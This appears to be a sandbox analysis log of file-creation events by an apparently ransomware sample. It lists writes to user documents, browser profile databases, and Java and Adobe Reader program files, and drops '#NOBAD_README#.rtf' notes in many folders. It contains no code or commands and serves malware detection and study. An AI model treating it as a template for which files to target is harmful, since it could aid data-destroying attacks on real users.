| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\0fnp zW65.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\jabswitch.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\GJtFCLZfMa1.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\java.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\localedata.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\kinit.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\zhBJB.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\permissions.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\places.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\ZYzs08Q3EzTpIFS9S.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\ktab.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\cf0Xne.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\java-rmi.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.properties.src | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\servertool.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\-Gi-.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\CIEXYZ.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\-k6Ks0Rn5K.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ph4FbxSYkvNgOdef0l1h\AjYnh NH_eQc- a.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.cpl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\aPwNhHugjJF9UGw\iMSNcoQ2TST\FBw1dGIoED2YSZ7OACmc.odt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\secmod.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\0K4h.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\aPwNhHugjJF9UGw\iMSNcoQ2TST\L6Ri9GZaO0Q1zRXNf.odt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\AccessCache.accdb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\klist.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\tnameserv.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\orbd.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\cursors.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\unpack200.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jce.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_fr.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\LINEAR_RGB.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\ssvagent.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_ja.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\PYCC.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\GRAY.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash_11@2x-lic.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_it.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash_11-lic.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunec.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash@2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_ko.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\meta-index | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\nashorn.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightItalic.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\invalid32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfr.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfr\default.jfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\snmp.acl.template | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\meta-index | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\java.policy | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\release | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files\Windows Journal\Templates\blank.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\management.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\To_Do_List.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Photo Viewer\ImagingDevices.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Exp_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Pages_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiItalic.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfr\profile.jfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management-agent.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\cacerts | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\blacklisted.certs | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\blacklist | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\LICENSE | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\tzmappings | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cert8.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ph4FbxSYkvNgOdef0l1h\YbGEyCT2JqJcmmxzDKl2.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\javaws.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Journal.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Seyes.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_Full.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\MoreTools.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\COPYING.LGPLv2.1.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AGMGPUOptIn.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\rmid.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\server\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\amd64\jvm.cfg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\currency.data | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\README.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_CN.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DropboxStorage.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\dnsns.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
